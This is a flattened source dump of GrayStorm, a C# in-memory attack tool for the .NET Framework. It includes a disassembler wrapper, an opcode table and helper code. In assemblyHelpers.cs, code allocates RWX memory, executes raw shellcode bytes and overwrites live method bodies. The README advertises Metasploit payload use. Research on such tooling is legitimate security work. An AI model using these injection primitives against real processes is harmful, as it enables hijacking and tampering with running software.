    // Enumerates every public static field of System.Reflection.Emit.OpCodes.
    private static Dictionary<short, OpCode> BuildTable()
    {
        Dictionary<short, OpCode> table = new Dictionary<short, OpCode>();
        foreach (FieldInfo field in typeof(OpCodes).GetFields())
        {
            OpCode op = (OpCode)field.GetValue(null);
            table.Add(op.Value, op);
        }
        return table;
    }
}
33 | }
34 |
--------------------------------------------------------------------------------
/IL Disasm/formatOutput.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | using System.Reflection;
7 |
8 | namespace GrayStorm
9 | {
class formatOutput
{
    /// <summary>
    /// Renders the operand attached to <paramref name="instruction"/> as a readable signature.
    /// </summary>
    /// <param name="instruction">Instruction whose <c>Data</c> may be a <see cref="MethodInfo"/> or a <see cref="ConstructorInfo"/>.</param>
    /// <returns>A signature string for method or constructor operands; null for anything else.</returns>
    public string setUpDataFormat(ILInstruction instruction)
    {
        MethodInfo asMethod = instruction.Data as MethodInfo;
        if (asMethod != null)
        {
            return FormatDataMethod(instruction, asMethod);
        }

        ConstructorInfo asConstructor = instruction.Data as ConstructorInfo;
        return asConstructor != null ? FormatDataConstructor(asConstructor) : null;
    }

    // "<return type> <declaring type>.<name>(<param type>, ...)"; parameter names are omitted.
    private string FormatDataMethod(ILInstruction instruction, MethodInfo selectedMethod)
    {
        if (instruction.Data == null)
        {
            return "";
        }

        string[] parameterTypes = selectedMethod.GetParameters()
            .Select(p => WhatTypeIsIt(p.ParameterType))
            .ToArray();

        return string.Format("{0} {1}.{2}({3})",
            WhatTypeIsIt(selectedMethod.ReturnType),
            WhatTypeIsIt(selectedMethod.DeclaringType),
            selectedMethod.Name,
            string.Join(", ", parameterTypes));
    }

    // "<declaring type><name>(<param type> <param name>, ...)"; there is no separator before the
    // constructor name, so a typical result reads "Ns.Type.ctor(...)".
    private string FormatDataConstructor(ConstructorInfo constructorInfo)
    {
        string[] parameters = constructorInfo.GetParameters()
            .Select(p => WhatTypeIsIt(p.ParameterType) + " " + p.Name)
            .ToArray();

        return WhatTypeIsIt(constructorInfo.DeclaringType)
            + constructorInfo.Name
            + "(" + string.Join(", ", parameters) + ")";
    }

    // Full name of a type; generic instantiations are written as "Definition[Arg1, Arg2]",
    // recursing into the type arguments. Generic parameters have a null FullName and print empty.
    private string WhatTypeIsIt(Type type)
    {
        if (!type.IsGenericType)
        {
            return type.FullName;
        }

        string[] arguments = type.GetGenericArguments()
            .Select(arg => WhatTypeIsIt(arg))
            .ToArray();

        return type.GetGenericTypeDefinition().FullName + "[" + string.Join(", ", arguments) + "]";
    }
}
104 | }
105 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2015 Topher Timzen
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Threading;
5 | using System.Windows.Forms;
6 |
7 | namespace GrayStorm
8 | {
static class Program
{
    /// <summary>
    /// The main entry point for the application.
    /// </summary>
    /// <remarks>
    /// Per the original author's note, this guards against two GUI threads hanging the
    /// application (something the injector, GrayFrost, also handles). When the current
    /// AppDomain's friendly name does not contain "GrayStorm", the WinForms message loop is
    /// started on a separate lowest-priority STA background thread; otherwise it runs on the
    /// calling thread.
    /// </remarks>
    [STAThread]
    public static void Main()
    {
        if (AppDomain.CurrentDomain.FriendlyName.Contains("GrayStorm"))
        {
            RunGui();
            return;
        }

        // Evaluated but not used by the original either; kept so the call still happens.
        string callingAssembly = System.Reflection.Assembly.GetCallingAssembly().FullName;

        ThreadPool.QueueUserWorkItem(delegate
        {
            Thread uiThread = new Thread(RunGui);
            uiThread.Priority = ThreadPriority.Lowest;
            uiThread.SetApartmentState(ApartmentState.STA);
            uiThread.Start();
            uiThread.IsBackground = true;
            Thread.Sleep(100);
        }, null);
        Thread.Sleep(100);
    }

    // Standard WinForms bootstrap followed by the main form's message loop.
    private static void RunGui()
    {
        Application.EnableVisualStyles();
        Application.SetCompatibleTextRenderingDefault(false);
        Application.Run(new grayStorm());
    }
}
47 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GrayStorm
2 |
3 | GrayStorm is an in memory attack platform that targets the .NET Framework and is injectable by utilizing [GrayFrost](https://github.com/graykernel/GrayFrost "GrayFrost").
4 |
5 | GrayStorm can
6 |
7 | - Attack the .NET JIT
8 | - Attack .NET at the ASM level
9 | - Use ASM and Metasploit payloads
10 | - Utilize objects on the Managed Heap
11 | - Read/Write a Method's ASM
12 | - Use on-the-fly compiled C# to overwrite call addresses and JIT Stubs
13 | - Disassemble a Method's ASM with [BeaEngine](http://www.beaengine.org/).
14 |
15 | For some how-to tips, visit [http://www.tophertimzen.com/](http://www.tophertimzen.com/).
16 |
17 | GrayStorm is currently under active support. If you have any issues or pull requests, do not hesitate to submit them!
18 |
19 |
--------------------------------------------------------------------------------
/assemblyHelpers/assemblyHelpers.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
/// <summary>
/// Unmanaged-memory primitives shared across GrayStorm: Win32 allocation/protection imports,
/// raw byte-level read and write of a function body at an <see cref="IntPtr"/>, and the small
/// native stubs used to call a function pointer. All state is static and unsynchronised.
/// </summary>
public class assemblyHelpers
{
    #region WINAPI Imports
    // Win32 MEM_* allocation flags (values as defined by the Windows SDK).
    [Flags()]
    public enum AllocationType : uint
    {
        COMMIT = 0x1000,
        RESERVE = 0x2000,
        RESET = 0x80000,
        LARGE_PAGES = 0x20000000,
        PHYSICAL = 0x400000,
        TOP_DOWN = 0x100000,
        WRITE_WATCH = 0x200000
    }

    // Win32 PAGE_* protection flags.
    [Flags()]
    public enum MemoryProtection : uint
    {
        EXECUTE = 0x10,
        EXECUTE_READ = 0x20,
        EXECUTE_READWRITE = 0x40,
        EXECUTE_WRITECOPY = 0x80,
        NOACCESS = 0x01,
        READONLY = 0x02,
        READWRITE = 0x04,
        WRITECOPY = 0x08,
        GUARD_Modifierflag = 0x100,
        NOCACHE_Modifierflag = 0x200,
        WRITECOMBINE_Modifierflag = 0x400
    }

    // Changes the protection of the pages covering [lpAddress, lpAddress + dwSize);
    // lpflOldProtect receives the previous protection. Returns false on failure.
    [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);

    // windows call to alloc space in the process
    [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);

    // windows call to free space in the process
    [System.Runtime.InteropServices.DllImport("kernel32")]
    public static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
    #endregion WINAPI Imports

    #region virtualAlloc
    /// <summary>
    /// Allocates a new committed region the size of <paramref name="shellcodeIN"/> with
    /// EXECUTE_READWRITE protection and copies the bytes into it.
    /// </summary>
    /// <param name="shellcodeIN">Bytes to place in the new region.</param>
    /// <returns>
    /// Base address of the region. The allocation result is not checked: if it is IntPtr.Zero the
    /// Marshal.Copy call fails rather than this method reporting the error.
    /// </returns>
    /// <remarks>Private RWX allocations are a widely monitored endpoint-detection signal.</remarks>
    public static IntPtr VirtualAlloc(byte[] shellcodeIN)
    {
        IntPtr virtualMemory = VirtualAlloc(IntPtr.Zero, new UIntPtr((uint)shellcodeIN.Length), AllocationType.COMMIT | AllocationType.RESERVE, MemoryProtection.EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(shellcodeIN, 0, virtualMemory, shellcodeIN.Length);
        return virtualMemory;
    }

    #endregion

    #region readFunction
    public delegate void dumpMemoryFunction_ByteArray(IntPtr targetIN, IntPtr memoryIntPtrIN, int sizeOfDataIN);

    /// <summary>
    /// Reads the native code at <paramref name="target"/> via <see cref="readFunction"/>, retrying
    /// up to four times while the result is empty.
    /// </summary>
    /// <param name="target">Address of the function's first byte.</param>
    /// <returns>
    /// The bytes read, trimmed after the last non-zero byte. Any exception ends the attempts
    /// silently, in which case the result is empty. Trimming also discards genuine trailing 0x00
    /// bytes of the code.
    /// </returns>
    public static byte[] DumpAFunction(IntPtr target)
    {
        byte[] memory = new byte[0];
        int tries = 0;
        try
        {
            while (memory.Length < 1 && tries != 4)
            {
                memory = readFunction(target);
                tries++;
            }
        }
        catch
        {
        }
        // FindLastIndex returns -1 for an all-zero or empty buffer, so the resize yields an empty array.
        int lastIndex = Array.FindLastIndex(memory, b => b != 0);
        Array.Resize(ref memory, lastIndex + 1);
        return memory;
    }

    /// <summary>
    /// Reads up to 500 bytes one at a time starting at <paramref name="assForeMan"/>, stopping
    /// early once a 0xC3 (ret) byte has been followed by three consecutive 0x00 bytes.
    /// </summary>
    /// <param name="assForeMan">Address to start reading from.</param>
    /// <returns>
    /// The bytes read, truncated just after the last 0xC3 seen; empty if no 0xC3 was seen at all.
    /// This is a heuristic for "end of function": a 0xC3 occurring inside the body (e.g. as part
    /// of an operand) may truncate or extend the result, and the loop reads whatever follows the
    /// function in memory until the pattern is met or 500 bytes are reached.
    /// </returns>
    public static byte[] readFunction(IntPtr assForeMan)
    {
        IntPtr ptrTemp = new IntPtr(assForeMan.ToInt64());
        byte[] memory = new byte[500];
        int t = 0;        // consecutive 0x00 bytes seen after the most recent 0xC3
        bool c3 = false;  // whether the run currently being tracked started with a 0xC3
        for (int i = 0; i < memory.Length; i++)
        {
            memory[i] = System.Runtime.InteropServices.Marshal.ReadByte(new IntPtr(ptrTemp.ToInt64() + i));

            if (memory[i] == 0xc3)
            {
                c3 = true;
            }
            else if (c3 && memory[i] == 0x00)
            {
                t++;
                if (t == 3)
                    break;
            }
            else
            {
                // Any other byte resets the "ret followed by zeros" pattern.
                c3 = false;
                t = 0;
            }
        }
        int lastIndex = Array.FindLastIndex(memory, b => b == 0xc3);
        Array.Resize(ref memory, lastIndex + 1);
        return memory;
    }
    #endregion

    #region callingMethodWithShellcode
    public delegate void launchShellCodeIntPtr(IntPtr target);

    /// <summary>
    /// Places <paramref name="callingMethodIN"/> in a fresh RWX region, obtains a managed delegate
    /// for it and invokes it with <paramref name="intPtrToFire"/> as its single argument.
    /// </summary>
    /// <param name="intPtrToFire">Pointer handed to the stub (the stubs below call through it).</param>
    /// <param name="callingMethodIN">Native bytes to execute, typically one of the call_a_fun_ptr stubs.</param>
    /// <remarks>
    /// Exceptions from the call are shown in a MessageBox rather than propagated. The region is
    /// released with MEM_RELEASE (0x8000) on both the success and failure paths.
    /// </remarks>
    public static void callATrueIntPtr(IntPtr intPtrToFire, byte[] callingMethodIN)
    {
        IntPtr p = VirtualAlloc(callingMethodIN);
        launchShellCodeIntPtr fireShellcode = (launchShellCodeIntPtr)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(p, typeof(launchShellCodeIntPtr));
        try
        {
            fireShellcode(intPtrToFire);
        }
        catch (Exception ex)
        {
            System.Windows.Forms.MessageBox.Show("Failed in callATrueIntPtr because of " + ex.Message);
        }
        VirtualFree(p, 0, 0x8000);
    }

    #endregion

    #region writeShellcode
    public delegate void writeMemoryFunction_ByteArray(IntPtr targetIN, IntPtr memoryIntPtrIN);

    /// <summary>Writes the shared <see cref="holder"/> buffer over the code at <paramref name="methodToOverWrite"/>.</summary>
    /// <param name="methodToOverWrite">Address of the first byte to overwrite.</param>
    public static void writeDynamicShellcode(IntPtr methodToOverWrite)
    {
        writeFunction(holder, methodToOverWrite);
    }

    //dirty deeds!
    /// <summary>
    /// Makes the memory at <paramref name="ptrTemp"/> writable and executable, then copies
    /// <paramref name="ShellCodeInGoodOut"/> over it byte by byte.
    /// </summary>
    /// <param name="ShellCodeInGoodOut">Bytes to write.</param>
    /// <param name="ptrTemp">Destination address.</param>
    /// <remarks>
    /// NOTE(review): VirtualProtect is asked to cover only 8 bytes (0x40 = PAGE_EXECUTE_READWRITE)
    /// while the loop writes ShellCodeInGoodOut.Length bytes, its return value is not checked,
    /// and the previous protection is never restored.
    /// </remarks>
    public static void writeFunction(byte[] ShellCodeInGoodOut, IntPtr ptrTemp)
    {
        uint old;
        VirtualProtect(ptrTemp, (uint)8, 0x40, out old);

        for (int i = 0; i < ShellCodeInGoodOut.Length; i++)
        {
            System.Runtime.InteropServices.Marshal.WriteByte(new IntPtr(ptrTemp.ToInt64() + i), ShellCodeInGoodOut[i]);
        }
    }
    #endregion

    #region read, calling and writing shellcode

    /// <summary>
    /// Switches the two call stubs to their 64-bit encodings. There is no corresponding
    /// method to switch back.
    /// </summary>
    public static void set64bit()
    {
        call_a_fun_ptr = call_a_fun_ptr_64;
        call_a_fun_ptr_INT3 = call_a_fun_ptr_INT3_64;
    }

    /// <summary>
    /// Shared scratch buffer: callers assign the bytes they want written (e.g. the GUI's hook and
    /// restore handlers) and then call <see cref="writeDynamicShellcode"/>.
    /// </summary>
    static public byte[] holder = new byte[]
    {
        0x00
    };

    /// <summary>
    /// Takes an IntPtr as an argument and will call it.
    /// </summary>
    /// <remarks>32-bit stub; the per-byte annotations are the original author's.</remarks>
    static public byte[] call_a_fun_ptr = new byte[]
    {
        0x60, //pushad
        0x55,//push ebp
        0x89, 0xe5, //mov ebp, esp
        0x8b, 0x44, 0x24, 0x28, //mov eax, [esp + 28]
        0xff, 0xd0, //call eax
        0x89, 0xec,//mov esp, ebp
        0x5d, //pop ebp
        0x61, //popad
        0xc3//ret
    };

    // 64-bit counterpart of call_a_fun_ptr (bytes left unannotated in the original).
    static public byte[] call_a_fun_ptr_64 = new byte[]
    {
        0x55, 0x50, 0x53, 0x52, 0x56, 0x57, 0x55, 0x54, 0x41, 0x50, 0x41, 0x51,
        0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
        0x48, 0x89, 0xe5, 0xff, 0xd1, 0x48, 0x89, 0xec, 0x41, 0x5f, 0x41, 0x5e,
        0x41, 0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58,
        0x5c, 0x5d, 0x5f, 0x5e, 0x5a, 0x5b, 0x58, 0x5d, 0xc3
    };

    // Same as call_a_fun_ptr, preceded by two int3 bytes — presumably to break into an attached debugger first.
    static public byte[] call_a_fun_ptr_INT3 = new byte[]
    {
        0xcc, 0xcc, //Int3
        0x60, //pushad
        0x55,//push ebp
        0x89, 0xe5, //mov ebp, esp
        0x8b, 0x44, 0x24, 0x28, //mov eax, [esp + 28]
        0xff, 0xd0, //call eax
        0x89, 0xec,//mov esp, ebp
        0x5d, //pop ebp
        0x61, //popad
        0xc3//ret
    };

    // Same as call_a_fun_ptr_64, preceded by two int3 bytes.
    static public byte[] call_a_fun_ptr_INT3_64 = new byte[]
    {
        0xcc,0xcc, 0x55, 0x50, 0x53, 0x52, 0x56, 0x57, 0x55, 0x54, 0x41, 0x50, 0x41, 0x51,
        0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
        0x48, 0x89, 0xe5, 0xff, 0xd1, 0x48, 0x89, 0xec, 0x41, 0x5f, 0x41, 0x5e,
        0x41, 0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58,
        0x5c, 0x5d, 0x5f, 0x5e, 0x5a, 0x5b, 0x58, 0x5d, 0xc3
    };

    #endregion memoryReadingShellcode
}
223 | }
224 |
--------------------------------------------------------------------------------
/assemblyHelpers/signatures.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Collections.Generic;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Reflection;
7 | using System.Reflection.Emit;
8 | using System.Linq.Expressions;
9 |
10 | namespace GrayStorm
11 | {
/// <summary>
/// Builds strongly typed delegates for arbitrary <see cref="MethodInfo"/>s by picking the
/// matching Action&lt;...&gt; / Func&lt;...&gt; type from the method's signature.
/// </summary>
public class signatures
{
    /// <summary>
    /// Creates a delegate of the Action/Func type that matches <paramref name="targetMethod"/>.
    /// </summary>
    /// <param name="targetMethod">Method to wrap.</param>
    /// <param name="target">Instance to bind for instance methods; null (the default) for static methods.</param>
    /// <returns>
    /// The delegate, or null when no Action/Func type fits the signature, when
    /// Delegate.CreateDelegate fails (e.g. a binding mismatch), or when it has not completed
    /// within the 100 ms window used below.
    /// </returns>
    public static Delegate getSignature(MethodInfo targetMethod, object target = null)
    {
        ParameterInfo[] myArray = targetMethod.GetParameters();
        List args = new List();

        foreach (ParameterInfo MyParam in myArray)
            args.Add(MyParam.ParameterType);

        // GetActionType/GetFuncType throw for signatures the Action/Func families cannot express
        // (presumably too many parameters or by-ref parameters; exact limits depend on the framework
        // version). Those failures are mapped to a null result.
        Type delegateType;
        if (targetMethod.ReturnType == typeof(void))
        {
            try
            {
                delegateType = Expression.GetActionType(args.ToArray());
            }
            catch
            {
                return null;
            }
        }
        else
        {
            // Func<> puts the return type last.
            args.Add(targetMethod.ReturnType);
            try
            {
                delegateType = Expression.GetFuncType(args.ToArray());
            }
            catch
            {
                return null;
            }

        }
        try
        {
            // Always true here: both branches above either assigned delegateType or returned.
            if (delegateType != null)
            {
                Delegate methodDelegate = null;
                // CreateDelegate runs on a throwaway thread that is aborted after 100 ms, so a
                // slow binding yields null instead of blocking the caller. Thread.Abort is a
                // .NET Framework facility (the project targets v3.5 per GrayStorm.csproj); it is
                // not supported on .NET Core / .NET 5+.
                System.Threading.Thread call = new System.Threading.Thread
                (
                    () =>
                    {
                        try { methodDelegate = Delegate.CreateDelegate(delegateType, target, targetMethod); }
                        catch { }
                    }
                );
                call.Start();
                System.Threading.Thread.Sleep(100);
                call.Abort();
                return methodDelegate;
            }
            else
                return null;
        }
        catch
        {
            return null;
        }
    }
}
74 | }
75 |
--------------------------------------------------------------------------------
/beaEngine/Constants.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm.beaEngine
2 | {
3 | public class BeaConstants
4 | {
5 | #region constants
6 | public static int INSTRUCT_LENGTH = 64;
7 |
8 | public enum SegmentRegister : byte
9 | {
10 | ESReg = 1,
11 | DSReg = 2,
12 | FSReg = 3,
13 | GSReg = 4,
14 | CSReg = 5,
15 | SSReg = 6
16 | }
17 |
18 | public enum PrefixType : byte
19 | {
20 | NotUsedPrefix = 0,
21 | InUsePrefix = 1,
22 | SuperfluousPrefix = 2,
23 | InvalidPrefix = 4,
24 | MandatoryPrefix = 8
25 | }
26 |
27 | public enum InstructionType : uint
28 | {
29 | GENERAL_PURPOSE_INSTRUCTION = 0x10000,
30 | FPU_INSTRUCTION = 0x20000,
31 | MMX_INSTRUCTION = 0x40000,
32 | SSE_INSTRUCTION = 0x80000,
33 | SSE2_INSTRUCTION = 0x100000,
34 | SSE3_INSTRUCTION = 0x200000,
35 | SSSE3_INSTRUCTION = 0x400000,
36 | SSE41_INSTRUCTION = 0x800000,
37 | SSE42_INSTRUCTION = 0x1000000,
38 | SYSTEM_INSTRUCTION = 0x2000000,
39 | VM_INSTRUCTION = 0x4000000,
40 | UNDOCUMENTED_INSTRUCTION = 0x8000000,
41 | AMD_INSTRUCTION = 0x10000000,
42 | ILLEGAL_INSTRUCTION = 0x20000000,
43 | AES_INSTRUCTION = 0x40000000,
44 | CLMUL_INSTRUCTION = 0x80000000,
45 |
46 | DATA_TRANSFER = 0x1,
47 | ARITHMETIC_INSTRUCTION,
48 | LOGICAL_INSTRUCTION,
49 | SHIFT_ROTATE,
50 | BIT_UInt8,
51 | CONTROL_TRANSFER,
52 | STRING_INSTRUCTION,
53 | InOutINSTRUCTION,
54 | ENTER_LEAVE_INSTRUCTION,
55 | FLAG_CONTROL_INSTRUCTION,
56 | SEGMENT_REGISTER,
57 | MISCELLANEOUS_INSTRUCTION,
58 | COMPARISON_INSTRUCTION,
59 | LOGARITHMIC_INSTRUCTION,
60 | TRIGONOMETRIC_INSTRUCTION,
61 | UNSUPPORTED_INSTRUCTION,
62 | LOAD_CONSTANTS,
63 | FPUCONTROL,
64 | STATE_MANAGEMENT,
65 | CONVERSION_INSTRUCTION,
66 | SHUFFLE_UNPACK,
67 | PACKED_SINGLE_PRECISION,
68 | SIMD128bits,
69 | SIMD64bits,
70 | CACHEABILITY_CONTROL,
71 | FP_INTEGER_CONVERSION,
72 | SPECIALIZED_128bits,
73 | SIMD_FP_PACKED,
74 | SIMD_FP_HORIZONTAL,
75 | AGENT_SYNCHRONISATION,
76 | PACKED_ALIGN_RIGHT,
77 | PACKED_SIGN,
78 | PACKED_BLENDING_INSTRUCTION,
79 | PACKED_TEST,
80 | PACKED_MINMAX,
81 | HORIZONTAL_SEARCH,
82 | PACKED_EQUALITY,
83 | STREAMING_LOAD,
84 | INSERTION_EXTRACTION,
85 | DOT_PRODUCT,
86 | SAD_INSTRUCTION,
87 | ACCELERATOR_INSTRUCTION,
88 | ROUND_INSTRUCTION
89 | }
90 |
91 | public enum EFlagState : byte
92 | {
93 | TE_ = 1,
94 | MO_ = 2,
95 | RE_ = 4,
96 | SE_ = 8,
97 | UN_ = 0x10,
98 | PR_ = 0x20
99 | }
100 |
101 | public enum BranchType : short
102 | {
103 | JO = 1,
104 | JC,
105 | JE,
106 | JA,
107 | JS,
108 | JP,
109 | JL,
110 | JG,
111 | JB,
112 | JECXZ,
113 | JmpType,
114 | CallType,
115 | RetType,
116 | JNO = -1,
117 | JNC = -2,
118 | JNE = -3,
119 | JNA = -4,
120 | JNS = -5,
121 | JNP = -6,
122 | JNL = -7,
123 | JNG = -8,
124 | JNB = -9
125 | }
126 |
// Bit groups describing one operand of a decoded instruction. Several sub-groups reuse the same
// numeric values (READ/WRITE overlap REG0/REG1), so a value is only meaningful relative to the
// Disasm field it was read from (ArgType vs. AccessMode in Structs.cs ArgumentType) — confirm
// the exact field/group pairing against the BeaEngine documentation.
// Note the name collides with the marshalling class GrayStorm.beaEngine.ArgumentType; callers
// qualify this one as BeaConstants.ArgumentType.
public enum ArgumentType : uint
{
    // Operand kind (high nibble).
    NO_ARGUMENT = 0x10000000,
    REGISTER_TYPE = 0x20000000,
    MEMORY_TYPE = 0x40000000,
    CONSTANT_TYPE = 0x80000000,

    // Register class for REGISTER_TYPE operands.
    MMX_REG = 0x10000,
    GENERAL_REG = 0x20000,
    FPU_REG = 0x40000,
    SSE_REG = 0x80000,
    CR_REG = 0x100000,
    DR_REG = 0x200000,
    SPECIAL_REG = 0x400000,
    MEMORY_MANAGEMENT_REG = 0x800000,
    SEGMENT_REG = 0x1000000,

    // Addressing form of CONSTANT_TYPE / MEMORY_TYPE operands.
    RELATIVE_ = 0x4000000,
    ABSOLUTE_ = 0x8000000,

    // Access mode bits (same numeric values as REG0/REG1 below).
    READ = 0x1,
    WRITE = 0x2,

    // Register index bits within a register class.
    REG0 = 0x1,
    REG1 = 0x2,
    REG2 = 0x4,
    REG3 = 0x8,
    REG4 = 0x10,
    REG5 = 0x20,
    REG6 = 0x40,
    REG7 = 0x80,
    REG8 = 0x100,
    REG9 = 0x200,
    REG10 = 0x400,
    REG11 = 0x800,
    REG12 = 0x1000,
    REG13 = 0x2000,
    REG14 = 0x4000,
    REG15 = 0x8000
}
167 |
// Two unrelated groups share this enum:
//  * UNKNOWN_OPCODE / OUT_OF_BLOCK are the non-length return values of BeaEngine.Disasm
//    (disassemble.disassembler compares the result against UNKNOWN_OPCODE);
//  * the masked groups below are option bits written into Disasm.Options
//    (disassembler uses 0x200, i.e. NasmSyntax).
// LowPosition/HighPosition presumably index the two positions of a packed field; not used in
// the visible code — confirm against the BeaEngine header.
public enum SpecialInfo : int
{
    UNKNOWN_OPCODE = -1,
    OUT_OF_BLOCK = 0,

    /* === mask = 0xff */
    NoTabulation = 0x00000000,
    Tabulation = 0x00000001,

    /* === mask = 0xff00 */
    MasmSyntax = 0x00000000,
    GoAsmSyntax = 0x00000100,
    NasmSyntax = 0x00000200,
    ATSyntax = 0x00000400,

    /* === mask = 0xff0000 */
    PrefixedNumeral = 0x00010000,
    SuffixedNumeral = 0x00000000,

    /* === mask = 0xff000000 */
    ShowSegmentRegs = 0x01000000,

    LowPosition = 0,
    HighPosition = 1
}
193 | #endregion constants
194 | }
195 | }
196 |
--------------------------------------------------------------------------------
/beaEngine/Disassemble.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Runtime.InteropServices;
6 |
7 | namespace GrayStorm.beaEngine
8 | {
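class disassemble
{
    #region disassemble
    /// <summary>
    /// Disassembles native code with BeaEngine and appends one line per instruction
    /// ("0x&lt;opcode&gt; &lt;instruction&gt;", NASM syntax) to <paramref name="disasmBox"/>.
    /// Decoding stops at the first <c>ret</c> (opcode 0xC3), at an unknown opcode, or once
    /// <paramref name="bytesToDisassam"/>.Length bytes have been consumed starting at
    /// <paramref name="methodIntPtr"/>. The previous version had no length bound and also never
    /// released the unmanaged buffer it allocated; both are fixed here.
    /// </summary>
    /// <param name="bytesToDisassam">Dump of the method body. Only its length is used: it bounds how
    /// far past <paramref name="methodIntPtr"/> the decoder may read (the decoder reads live
    /// process memory at that address, not this array).</param>
    /// <param name="disasmBox">Rich text box that receives the listing and any error text.</param>
    /// <param name="methodIntPtr">Address decoding starts at. BeaEngine also uses it to render
    /// relative jmp/call targets, so it must be the method's real entry point.</param>
    public void disassembler(byte[] bytesToDisassam, System.Windows.Forms.RichTextBox disasmBox, IntPtr methodIntPtr)
    {
        if (bytesToDisassam == null || bytesToDisassam.Length == 0 || methodIntPtr == IntPtr.Zero)
        {
            disasmBox.AppendText("Beaengine error: nothing to disassemble\n");
            return;
        }

        IntPtr disasmPtr = IntPtr.Zero;
        try
        {
            var disasm = new Disasm();
            // The 64-bit entry point takes a raw pointer, so the structure is round-tripped through
            // unmanaged memory; the 32-bit entry point marshals the class directly.
            disasmPtr = Marshal.AllocHGlobal(Marshal.SizeOf(disasm));

            disasm.Archi = IntPtr.Size == 8 ? 64u : 32u;
            disasm.Options = (ulong)BeaConstants.SpecialInfo.NasmSyntax; // 0x200: display in NASM syntax
            disasm.EIP = methodIntPtr;

            // Never decode past the end of the dumped bytes.
            long endAddress = methodIntPtr.ToInt64() + bytesToDisassam.Length;

            while (disasm.EIP.ToInt64() < endAddress)
            {
                int result;
                Marshal.StructureToPtr(disasm, disasmPtr, false);
                if (IntPtr.Size == 8)
                {
                    result = BeaEngine.Disasm64(disasmPtr);
                    Marshal.PtrToStructure(disasmPtr, disasm);
                }
                else
                {
                    result = BeaEngine.Disasm(disasm);
                }

                if (result == (int)BeaConstants.SpecialInfo.UNKNOWN_OPCODE)
                {
                    disasmBox.AppendText("Beaengine error: unknown opcode \n");
                    break;
                }
                if (result <= 0)
                {
                    // OUT_OF_BLOCK (0) or any other non-positive code: EIP would not advance,
                    // so stop instead of looping forever.
                    break;
                }

                disasmBox.AppendText("0x" + disasm.Instruction.Opcode.ToString("X") + " " + disasm.CompleteInstr.ToString() + "\n");

                // Stop at the first ret (the original compared the hex string "C3").
                if (disasm.Instruction.Opcode == 0xC3)
                    break;

                // A positive result is the length of the instruction just decoded.
                disasm.EIP = new IntPtr(disasm.EIP.ToInt64() + result);
            }
        }
        catch (Exception ex)
        {
            disasmBox.AppendText("Beaengine error: " + ex.Message.ToString() + "\n");
        }
        finally
        {
            if (disasmPtr != IntPtr.Zero)
                Marshal.FreeHGlobal(disasmPtr);
        }
    }
    #endregion disassemble
}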
77 | }
78 |
--------------------------------------------------------------------------------
/beaEngine/Engine.cs:
--------------------------------------------------------------------------------
1 | using System.Runtime.InteropServices;
2 | using System;
3 |
4 | namespace GrayStorm.beaEngine
5 | {
public class BeaEngine
{
    #region P/Invoke
    /// <summary>
    /// 32-bit BeaEngine entry point. The <see cref="Disasm"/> object is marshalled in and back out
    /// around the call, so the caller reads the decoded fields straight from it. The caller
    /// (disassemble.disassembler) treats a positive return value as the instruction length and
    /// compares it against BeaConstants.SpecialInfo.UNKNOWN_OPCODE.
    /// </summary>
    /// <remarks>
    /// The library is referenced by bare file name, so it is resolved through the loader's normal
    /// DLL search order rather than from a fixed path; if the tool is run from an untrusted
    /// directory, a same-named DLL there is loaded instead. Loading from an explicit, trusted
    /// path avoids that.
    /// </remarks>
    [DllImport("BeaEngine.dll")]
    public static extern int Disasm([In, Out, MarshalAs(UnmanagedType.LPStruct)] Disasm disasm);

    /// <summary>
